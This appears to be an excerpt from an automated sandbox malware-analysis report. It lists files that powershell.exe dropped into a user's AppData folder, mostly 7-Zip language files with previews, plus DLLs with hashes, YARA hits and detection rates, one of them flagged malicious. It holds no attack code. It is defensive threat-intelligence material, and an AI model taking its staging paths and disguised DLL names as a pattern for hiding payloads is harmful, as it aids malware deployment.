                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 9.07 : GENOVES.com.ar..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Ligurian..Zeneize..401..D'ac.rdio..Anulla........&Sci..&No..S.&ra..Agiutto....&Continoa..440..Sci pe &Tutti..No pe T&utti..Ferma..Inandia torna..Into &sfondo..&In primmo cian..&Paoza..In paoza..Ti . seguo de voei anul.?..500..&Archivio..&Modifica..&Vixoalizza..&Preferii..&Strumenti..A&giutto..540..&Arvi..Arvi into Manezat. d'archivi 7-Zip..Arvi inte Explorer..&Vixoalizza..&Modifica..Ri&nomina..&C.pia inte.....&Sp.sta inte.....Scancel&la..&Dividi l'archivio.....&Unisci i archivi.....P&ropiet...Comen&ta.....Calcola somma de contr.llo..Dif..Crea cartella..Crea archivio..Sc&i.rti..600..Sele.ionn-a &tutto..Desele.ionn-a tutto..In&verti sele.ion..Sele.ionn-a.....Desele.ionn-a.....Sele.ionn-a pe tipo..Desele.ionn-a pe tipo..700..Figue &grende..Figue picinn-e..&Listin..&D.ti..730..Nisciun ordine..Vista ciatta..&2 barco.n..Bare di &Strumenti..Arvi cartella prin.ip...Livello supei...Crono
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9607
                                                                                                                                                          Entropy (8bit):5.125178074314148
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:inIsB9j4K01iwimxhiZ8yczB7XhyyYR1gQEfo9GcC7MDc:inIsyiwnhiZ1czn9YwQuZ7MDc
                                                                                                                                                          MD5:92D03523DD0E7E7B2862A6396ABAD455
                                                                                                                                                          SHA1:EA1FC2BAC5AB8D5EE329A5945F1ED90269CB7AEC
                                                                                                                                                          SHA-256:C5DA5B37BE32FA4CDD8B938D479C0327B84C9F83C948EB7E65F4DDC15A6BEEAE
                                                                                                                                                          SHA-512:1FB0AE4117DD69418ECC371F699630D79F89DAAA3099F57EBFA4A7DE398CBDEF095E0B029A547DFB6936A336A9E2748B880EC83A65554A1858F2F87104D63E27
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 2.30 : Marius Navickas : http://www.teisininkas.lt/ivairus/7-zip:..; 4.57 : Domas Jokubauskis..; 15.05 : Vaidas777 (termin. .altinis: www.ra.tija.lt)..;..;..;..;..;..;..;..;..0..7-Zip..Lithuanian..Lietuvi...401..Gerai..At.aukti........&Taip..&Ne..&U.daryti..Elektroninis .inynas....&T.sti..440..T&aip Visiems..Ne v&isiems..Sustabdyti..I. naujo..&Fone..&Pirminis procesas..&Laikinai sustabdyti..Laikinai sustabdyta..Ar j.s esate tikri, kad norite at.aukti?..500..&Failas..K&eisti..&Rodyti..M.gi&amiausi...ran&kiai..&Elektroninis .inynas..540..&Atverti..Atverti v&iduje..Atverti i.&or.je..&Rodyti..K&eisti..Pervadi&nti..&Kopijuoti ......&Perkelti .......alin&ti..&Skaidyti fail......Jungti &failus.....Savy&b.s..Kome&ntuoti..Skai.iuoti kontrolin. sum...Sulyginti..Sukurti aplank...Sukurti fail...I.ei&ti..Nuoroda..&Alternatyv.s srautai..600..Pa.ym.ti &visk...Nu.ym.ti visk...Atv&irk.tinis .ym.jimas..Parinkti.....At.ym.ti.....Pasirinkti
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):943472
                                                                                                                                                          Entropy (8bit):6.691167848639275
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:TlUbWq3/gquYUJ4Vgv0eUnDaE0efxfXT95:pUR4quYUJ4VgceXE0gxfjv
                                                                                                                                                          MD5:D22B9DA713AB36102C9C3D812AF8C12D
                                                                                                                                                          SHA1:371FDBF6AE6A9A2E5C0560FC94EBA3290028A252
                                                                                                                                                          SHA-256:95B538B47E02D0AD2BD15D47EFC18695D5E379EF61568B81EF405773D9C199BB
                                                                                                                                                          SHA-512:E5AE51F79403358AF60BB3EA663251BADAC57414813F5537D763B0B95504A393FB2D34C94C4B7328EC13F58E74A7147D3A72E63E62973C4C5D80671BE1C8FACE
                                                                                                                                                          Malicious:false
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\madHcNet32.dll, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8934
                                                                                                                                                          Entropy (8bit):4.259244159879149
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ia3g0F7SHayJ5vKVEB3Bxg5GteGIxpWNMll39oWvt/i4drxJ4MrZEXSW:iWg0zyJlKVEB3A6SM2mWvt/i4dtJ4MNO
                                                                                                                                                          MD5:71D42ABE45803AC9C3DA5FCACF9CC59C
                                                                                                                                                          SHA1:98A1049906972ABB480ABAF1F5658C1B8C10F27C
                                                                                                                                                          SHA-256:78F5CB9345AB258CF745EAA90D44C7A7A73D3FE06EA182B1298A989135FFA11F
                                                                                                                                                          SHA-512:A0096575D6F911CC2600DAC93D6FD7AA8D9E2F9F71A92571A76996FB4C47BDB714BBA453C862B3F42CC5F4BAAF2AED1DFF3C9D6F84A3E2053FF2037C56AB85A5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.09 : Gabriel Stojanoski..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Macedonian..............401....................&....&....&...................&.........440.... &........ .&............................&........&........&...................... ....... ...... .. ........?..500..&..........&.......&........&.........&........&.......540..&.............. &.............. &........&........&.......&.............&....... .......&........ .......&.........&...... ................&....... .............&.................&.................... .................... ..........&........600............ &................ ...
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8680
                                                                                                                                                          Entropy (8bit):4.552914713447724
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i2GVqAYj834yHocynU6GwgeBLHvNlIfYfFCkMupHCwFxhjPQtQP1d/R1JTPUJ:i7kIYfUjuZxhDDHZQJ
                                                                                                                                                          MD5:8756027ADF94B3CC3D6C42F0D3FB4AF0
                                                                                                                                                          SHA1:823BDBC5ABF1D2F3528AA319A417EE090D1C6928
                                                                                                                                                          SHA-256:CF5245D17224F85011ED85062957DBFD936DD760A214980FC8F2EB69E6BA3CFC
                                                                                                                                                          SHA-512:92715A814D24318533BA26AF542B174DF12E5D8CD40251BC27890345EB6C64D174448745B2B138BD0A7E0FA0D96B803FAB9B29F89767729E64A95B164FB27F29
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 3.12 : Bayar..; : Bayarsaikhan..;..;..;..;..;..;..;..;..;..0..7-Zip..Mongolian........ .....401...................&......&......&.................&............440.....&. .......... .&................ .........&.. ......&.... .....&... ......... ........... ....... ..... ... ..... ..?..500..&......&.......&..........&..... ......&............&.........540..&........... &........... &......&.......&.............. .&............ &................. &.........&........&.... .................... ............&........ .........&................ ............ ..........&.....600......... ..&.............. .......&......... .
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):20722
                                                                                                                                                          Entropy (8bit):3.631283338815982
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:ip3jpGUSlwi6aHQIXqB6B22bKP995BOqB8A5Y8KsC3u6cIVFJFGtMksJYkXoFs85:MWJbm50qN5Esd6t/XWjgqVpzs4XZd8sL
                                                                                                                                                          MD5:BA28C5C312D1A7827B40ED84F1F6F85B
                                                                                                                                                          SHA1:72788C4B14C47A3988245E81FC6E7BBB8F88442F
                                                                                                                                                          SHA-256:92898472C1DB5248B0556FB5BAFDA8090684249B561DE5EF2A84C10F2F4383CA
                                                                                                                                                          SHA-512:35871824ADEDE6169118087D28FE3C78EA09CB259C7C168E83A22CA74C024D9F0D61250AD1FC9F75B71A8EE5235A12FFD52C146B8232B7BEA84EC024B19DA7D5
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 7-Zip 9.20..; Saqirilatu Mongolqileb..; QQ:136087084 Email:saqirilatu@126.com..; Mongol soft QQ bulug .: 39338772 .:38803882..; Toli Mongolian IME ..; http://hi.baidu.com/saqirilatuu/item/9438213716f316ebe7bb7a8d..;last updated: 2014-1-1..;..;..;..;..0..7-Zip..Mongolian (Unicode)........ ......401............................ (&Y)...... (&N)........ (&C)........................ (&C)..440........ .... (&A)........ .... (&L).................. ............ ..... (&B)........ ..... (&F)........... (&P)......... ........... ...... ........ .. ...500....... (&F)............. (&E)....... (&V)...........
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):22220
                                                                                                                                                          Entropy (8bit):3.789538915454832
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:ip3pxHmpcSmhZcbnD1e+Ft9780rdLdNQwL4rG/d+RWsB/O54Q4gLwqZ816d20xUS:ip3jJfHp4BLLCJOIYB
                                                                                                                                                          MD5:A0D06DC2B7F53ACD8CDEBF7864080CD1
                                                                                                                                                          SHA1:A4B9C4D1C4355BD90356E60289FB4EFCE0046B6A
                                                                                                                                                          SHA-256:47BFE43F3F5A88A0F366FB317A542CDC1E216F8C368DDC67252480EDE7D130F4
                                                                                                                                                          SHA-512:811FDBFC11F8DB60B2D059D433495FD50220E5A718ED9FE7F9C422D9695353825129B05E0F287419D4784C3564EA7CF7BE9117C4408170F4AFA3353FBC875442
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 7-Zip 9.20..; Saqirilatu Mongolqileb..; QQ:136087084 Email:saqirilatu@126.com..; Mongol soft QQ bulug .: 39338772 .:38803882..; Toli Mongolian IME ..; http://hi.baidu.com/saqirilatuu/item/9438213716f316ebe7bb7a8d..;last updated: 2013-12-11..; Update and Spelling corrected Bayarsaikhan..;..;..;..0..7-Zip..Mongolian (MenkCode).......... ......401.................................. (&Y)...... (&N).......... (&C)........................... (&C)..440......... ..... (&A)......... .... (&L)..................... ............. .... (&B)....... ... (&F)........... (&P)......... ............. ........ ............ .. .
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):10948
                                                                                                                                                          Entropy (8bit):4.055130920365555
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iSdCIrunpyKHseL4bzwltFrjVL0TEpbpFeki8rJNhBB:iSt6pypS4A7FYA1r
                                                                                                                                                          MD5:2E9FC42DBD17E30F8DB8205FA2D18543
                                                                                                                                                          SHA1:60639E6D06A38D5C507136C130A172D606B698E7
                                                                                                                                                          SHA-256:08B8F7FF35DD4315133E04FD17B6FB896D63B9C87040A2CC68A83E81EA4EFD78
                                                                                                                                                          SHA-512:7E1AA7234DC2C07654847DE01600787BA735E9CCF5D376D37696F3810418A357BEB1D611A164FDFD7A24CA33E7BED150DF08187D4ADE6C973C45BE5DF74FD95F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.42 : ...... ..... ....... (Subodh Gaikwad)..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Marathi.........401...................&....&......&............&......440..&.... .. ....&.... .. ................... .... .....&.... ......&.... .....&.......................... .... .......... ...... ... ..?..500..&......&........&........&......&.......&.....540..&......&.... ......&..... ......&.......&........... .....&..............&.........&.......&.... ..... ............ ..........
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1075904
                                                                                                                                                          Entropy (8bit):6.563245468568026
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:9wsK8YWuTCipwKm3ZCdX+y0Cg57ZrVmK5UhYX5NN/u3ZeEb+LJkKuZl1Y1e:P6WuFKKVuig5jZ5xX5P2bKyKu1j
                                                                                                                                                          MD5:94321A6D490CA5442CF36B07DB16419C
                                                                                                                                                          SHA1:639E08BC92106902FACF7CEFDC9B340682572B2A
                                                                                                                                                          SHA-256:A7827463E9587A238DB927CF61AB92B95C0EF52B18467583DD859BED98543DA7
                                                                                                                                                          SHA-512:1944916CA997C01A11C77016791612382832AF6AB4822992694460AC4C9E5BA72E193416FA17C898A1D201826BDAF3176A2B303C035A37B124CCD4937D4F4B74
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\zcZPHzDH\x64\plugins\cache\Language\mvrSettings32.dll, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 65%
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):13609
                                                                                                                                                          Entropy (8bit):3.9309107268099224
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iv4xgZB/n6NclUY0PA8jaeQPYX89RcgDZjGKOVdp:ivYUSNcOY0PA8+0gfOJ
                                                                                                                                                          MD5:C7ED0560A6145A417B1E92546ED6B0F1
                                                                                                                                                          SHA1:6BE9FF3E7EF34767CAA165A0E9851914BB65378A
                                                                                                                                                          SHA-256:C129F67193295736E1C1FF4AC7245CBD737A07EA6073B43FD22AC767F3D56E23
                                                                                                                                                          SHA-512:508504216C916C6EF168062C1D13336594D469DB92D8B40571C726A4B3053CA6FD0C57F9F2FC389F3216A5C663EBDC4AA520462EF39ABD5BE55C7B87B522D90F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.37 : Shiva Pokharel, Mahesh Subedi..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Nepali..........401..... ....... .................&....&......&.... ....................&.... ............440..&...... ....&...... .....................: .... ...........&...........&..........&.. ............. ............. .... .... .... ......... ?..500..&......&....... ...........&............&..........&.......&.......540..&...................... ...................... ....
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9158
                                                                                                                                                          Entropy (8bit):4.922508061076594
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:i3oJFqYSagoQss8Yok0y0qiqfUaep0XTrsv3H2TzQEjsrKdOZhGcicbyoL0rnycW:i3AQZUaemXTOWTMosI9loAry34sf
                                                                                                                                                          MD5:54169E744254BB5A4182BCB2678F8479
                                                                                                                                                          SHA1:244FF8C38C8DA10E20282CF74A08E18AB165640C
                                                                                                                                                          SHA-256:8A74F64C91C25DA6056B054D388BF1BBD97384AD7D0086F86DF0240E077C6149
                                                                                                                                                          SHA-512:B798027C10F2AA7F06FA4FC3473F3040A23968D967AA93C08D072F86DA2747D7847F8D7B37BC796A8270721C200978C61B1A4A5C6FD8B87845FDBB1337A142A2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Bert van Velsen..; 4.26 : Jeroen van der Weijde...; : Harm Hilvers..; 9.07 : Jeroen Tulp ..; 15.00 : Jeroen Tulp ..; 21.03 : Quinten Althues..; 21.05 : Jeroen Tulp..;..;..;..;..0..7-Zip..Dutch..Nederlands..401..OK..Annuleren........&Ja..&Nee..A&fsluiten..Help....&Hervatten..440..Ja op &alles..Nee op a&lles..Stoppen..Herstarten..&Achtergrond..&Voorgrond..&Pauzeren..Gepauzeerd..Weet u zeker dat u wilt annuleren?..500..&Bestand..Be&werken..Bee&ld..&Favorieten..E&xtra..&Help..540..&Openen..Open b&innen..Open b&uiten..Be&kijken..&Bewerken..&Hernoemen..&Kopi.ren naar.....&Verplaatsen naar.....Verwij&deren..Bestand &opsplitsen.....Bestanden &samenvoegen.....&Eigenschappen..O&pmerking plaatsen.....Controlegetal berekenen..Delta..Nieuwe map..Nieuw bestand..&Sluiten..Koppeling..&Alternate streams..600..&Alles selecteren..Alles deselecteren..Selectie &omkeren..&Selecteren.....&Deselecteren.....Selecteren op &type..Deselecteren op t&ype..700..&Grote pictogra
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):798054
                                                                                                                                                          Entropy (8bit):7.883843199788873
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12288:y2eLUppvK0pIw10hf2SZCFILyTVAtIeH6b5+zoTcefCDlNxEawbSSWZ3O:B3e1nGepfH6bCe6pNQvq3O
                                                                                                                                                          MD5:2BA2923D166E89451FAB8B0F1F48A552
                                                                                                                                                          SHA1:A3B8226B8FC5266105347CCB623500750A1B561E
                                                                                                                                                          SHA-256:51E588E5C974CBB81B3C22ED4BA9C7188DC057A2BD77B248F4EEC4BABCF23761
                                                                                                                                                          SHA-512:71207BB1493412737EE821754F154B76E45EE73BE539F7DF7E188E18CC018A45C42312844322F5BF0D8352CB3EE432F1314D8C69E458CBEC25C9B47A5BF7BB0A
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):15022
                                                                                                                                                          Entropy (8bit):4.117786673775278
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iK8eAMv6KYvDPVWnkFGdRq8A9UCGd6KFnidivnjnqAPvowQoNVq4qEFmQt+MN9YL:iKpZnt/dhCivnjdjQKFNt+MNfU
                                                                                                                                                          MD5:6C48ED7DEBA6D3EFE6447BE948471810
                                                                                                                                                          SHA1:4E1D76D565211416F0ED32A2CDD473D9AC54A61F
                                                                                                                                                          SHA-256:377F793EEDF3A935DDD6260D72AC3CADA9391AAFDF1F019D0BE72BE2B83A5DD9
                                                                                                                                                          SHA-512:22B8BBB70492E19EDE9C5E74483A1A6D57D4F86F38D1321331E0137C7953C6612E03F854FB1BB0C3234BBC0F561E92501A345D881FC09DDE598E217D946018DD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.53 : Gurmeet Singh Kochar..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Punjabi, Indian..........401..... ....... .............. (&Y)...... (&N)..... ... (&C).............. ... (&C)..440........ .. ... (&A)........ .. .... (&l)........... .... .............. (&B)........... (&F)...... (&P)...... ........ ..... ........ .. ... .... ....... ..?..500...... (&F)..... (&E)...... (&V)......... (&a)..... (&T)...... (&H)..540...... (&O)...... .... (&I)...... .... (&u)....... (&V)..... ... (&E)..... .... (&m)...... ...... .. ... .....
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9426
                                                                                                                                                          Entropy (8bit):5.340689293594529
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iny0xONopVdHc+Xmy9hk1s6i+6rELzpZ6+0FVEleeNRChH6ufZfjp8Rb:in3xOgvXm9s5+6QLz+jUlX2rp8Rb
                                                                                                                                                          MD5:2CDF63E6B3F3A474465D0D88E5386718
                                                                                                                                                          SHA1:AA4F3F839B35C68EA2A17E7A63053262E94F952D
                                                                                                                                                          SHA-256:223C109301A7BBF01FC57C42609083B28E3FCEDEDC1F6E6DCDFDC8EC1580C51D
                                                                                                                                                          SHA-512:DB7C086B9FD9111D468B7BB4F55455524FE161869C20C20AD7E65E5B8EEE38FD4E3B19AAA183C69C87D2C61F4561D12C90AA966A07156F193AF59BCB6DB10FF7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : cienislaw..; : pixel..; 9.07 : F1xat..; 9.33 : .ukasz Maria P. Pastuszczak..; 21.03 : Micha. L...;..;..;..;..;..;..0..7-Zip..Polish..Polski..401..OK..Anuluj........&Tak..&Nie..&Zamknij..Pomoc....&Kontynuuj..440..Ta&k na wszystkie..Ni&e na wszystkie..Zatrzymaj..Pon.w..&T.o..&Pierwszy plan..&Wstrzymaj..Wstrzymano..Czy na pewno chcesz anulowa.?..500..&Plik..&Edycja..&Widok..&Ulubione..&Narz.dzia..Pomo&c..540..&Otw.rz..Otw.rz &wewn.trz..Otw.rz na &zewn.trz..Pod&gl.d..&Edytuj..Zmie. &nazw...Kopiuj &do.....&Przenie. do.....&Usu...Podzie&l plik.....Z..&cz pliki.....W.&a.ciwo.ci..Ko&mentarz..Oblicz sum. kontroln...R..nice pomi.dzy plikami..Utw.rz &folder..U&tw.rz plik..Za&ko.cz..Dow&i.zanie..&Alternatywne strumienie..600..Z&aznacz wszystko..&Odznacz wszystko..Odwr.. &zaznaczenie..Zaznacz.....Odznacz.....Zaznacz wed.ug typu..Odznacz wed.ug typu..700..&Du.e ikony..&Ma.e ikony..&Lista..&Szczeg..y..730..Nieposortowane..Wi
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):8671
                                                                                                                                                          Entropy (8bit):4.651596660116007
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:ikrJrFkaUGFoiZxn8pSbo4YCVtH7tpY+Qan1JZ0d+yccGFs8Ie30aNMfm88B9eDb:ieJZ0o98pT4YCP1pfSDHayRvpyDJe
                                                                                                                                                          MD5:8F15262B3C1CF560B6352FAE4A5FDE21
                                                                                                                                                          SHA1:C493F7834117F02AAB3DD34999ACF55977D94C67
                                                                                                                                                          SHA-256:881B19DD1F74251E475855B8BDB53CE9AF1C3D2654A9331B069A3C273F723769
                                                                                                                                                          SHA-512:18406E2C762F5E7D5D37D76C0FDC8A8A85D50FCB66B2D92D072B4CA3714FCA6EAE9CCD9DD50BBB00DA84BCCFD07EBA290930C17A1B9342626715A6D6DE8191D2
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; 4.53 : 2007-12-26 : Pathanisation Project : pathanisation.pakhtosoft.com..;..;..;..;..;..;..;..;..;..;..0..7-Zip..Pashto........401.......................&....&.......&..................&..440...... .. ..&...&... .. .........................&........&.......&............. ...... .... ..... .. ... .. ......500.......&......&.....&...&............&.......&..540..........&......& ............. .&............&......&....&............. .....&....... .....&.......&.......... ...&.......... ...&.....................&......... ............. ............ ........&.....600..... ....&..... ............. .......&........................ ... ........ ...
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9515
                                                                                                                                                          Entropy (8bit):5.04214621707661
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:icoGT04mzNN8hYivh5gtE/PkjY09fdNQuQ:ibGg4mzNhi4tEHoDfHQuQ
                                                                                                                                                          MD5:7B02E1AE16E2E709D7C97DE560B4DBE9
                                                                                                                                                          SHA1:191A54644417F7D36F5CB4182DCDB3737D74BE51
                                                                                                                                                          SHA-256:DA0B58F52BBC131F967942D1D8E9DE1B5721AE864BC21852A0AD4062332297CB
                                                                                                                                                          SHA-512:4F689F854DB3F766B5E53CE2F19E9F8293C075EE3F9B18098EB05B352F2EC95DF85E49A78540781EB531BCE60C7B1F7890F1FE3C65200DEC3CB908E90FB827A1
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Francisco Jr..; 4.37 : Fabricio Biazzotto ..; 18.05 : Atualizado por Felipe..;..;..;..;..;..;..;..;..0..7-Zip..Portuguese Brazilian..Portugu.s Brasileiro..401..OK..Cancelar........&Sim..&N.o..&Fechar..Ajuda....&Continuar..440..Sim pra &Todos..N.o pra T&odos..Parar..Reiniciar..&Em 2. plano..&Em 1. plano..&Pausar..Pausado..Voc. tem certeza que voc. quer cancelar?..500..&Arquivo..&Editar..&Visualizar..F&avoritos..&Ferramentas..&Ajuda..540..&Abrir..Abrir &por Dentro..Abrir p&or Fora..&Visualizar..&Editar..Re&nomear..&Copiar Para.....&Mover Para.....&Apagar..&Dividir arquivo.....Com&binar arquivos.....P&ropriedades..Comen&t.rio..Calcular checksum..Diff..Criar Pasta..Criar Arquivo..S&air..Link..&Correntes Alternantes..600..Selecionar &Tudo..Desmarcar Tudo..&Inverter Sele..o..Selecionar.....Desmarcar.....Selecionar por Tipo..Desfazer sele..o por Tipo..700...co&nes Grandes...c&ones Pequenos..&Lista..&Detalhes..730..Desorganizado..Visualiza..o
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):9444
                                                                                                                                                          Entropy (8bit):5.027498368209972
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:imxbxSa4GR9N8zMzM0KgWWauXYY5wNKDyYaipnj0aQiAKECNIuZB:imBxSNGR9N8zMzM0KgERYKNYy3ipnj0G
                                                                                                                                                          MD5:E6F09B147CB07532C12E47B05CCF87B7
                                                                                                                                                          SHA1:1B6D069D431EDAC41C4221A120E8CB9B1152FC70
                                                                                                                                                          SHA-256:55807ED90AE0D9216B93EC7E1D0571CB16D7F9DB40723581AEFC4EA829D4D182
                                                                                                                                                          SHA-512:95F7DB5DD308CA3E91FC3203DFB9FA9DBABD7EEC6CF1A8590EEF0CC670C6B08447BA09AD151A972D721DBFCFA03468BB7E9D2CAC190D6C72C543CE5A16C7AA32
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:.;!@Lang2@!UTF-8!..; : Carlos Macao..; : Jo.o Alves..; : Jo.o Frade (100 NOME TR)..; 4.46 : Rui Costa..; 9.17 : S.rgio Marques ..; 15.00 : Rui Aguiar..;..;..;..;..;..0..7-Zip..Portuguese Portugal..Portugu.s..401..OK..Cancelar........&Sim..&N.o..&Fechar..Ajuda....&Continuar..440..Sim p/ &Todos..N.o p/ T&odos..Parar..Reiniciar..&Segundo plano..P&rimeiro plano..&Pausar..Em pausa..Quer mesmo cancelar?..500..&Ficheiro..&Editar..&Ver..F&avoritos..Ferramen&tas..&Ajuda..540..&Abrir..Abrir &dentro..Abrir &fora..&Ver..&Editar..Mudar& o nome..&Copiar para.....&Mover para.....&Eliminar..&Separar ficheiro.....Com&binar ficheiros.....P&ropriedades..Come&nt.rio..Calcular o checksum..Diff..Criar pasta..Criar ficheiro..&Sair..Link..&Alternar Fluxo..600..Seleccionar &Tudo..Desmarcar tudo..&Inverter selec..o..Seleccionar.....Desmarcar.....Seleccionar por tipo..Desmarcar por tipo..700...cones &grandes...cones &pequenos..&Lista..&Detalhes..730..Sem ordem..Vista plana..&2 pa
                                                                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):7675
                                                                                                                                                          Entropy (8bit):5.101248190322628
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:192:iVF8khF2yUYtHwfajHwKlPVS6LWbsWGGqZfG7ORVCPF27l:iD8mUYtHCxuPjWQu6KP0x
                                                                                                                                                          MD5:E3EE837F02A1F6E4B2213EB36C025284
                                                                                                                                                          SHA1:56CCAFA0F9C3D805A845311C2EBD80C93A595B17
                                                                                                                                                          SHA-256:F168BB4D026782134CC6C261006B815850E753A27FB47C4F23EE617666459A66
                                                                                                                                                          SHA-512:A923F953AF5DF72E04B5C38E523A003B85C0ED74E20AE1C3A2D4848828E03DE8E703953CFCF653C148A0EEAA9365F9187804DE0D534435CCB90DAC1C4EA68A63
                                                                                                                                                          Malicious:false
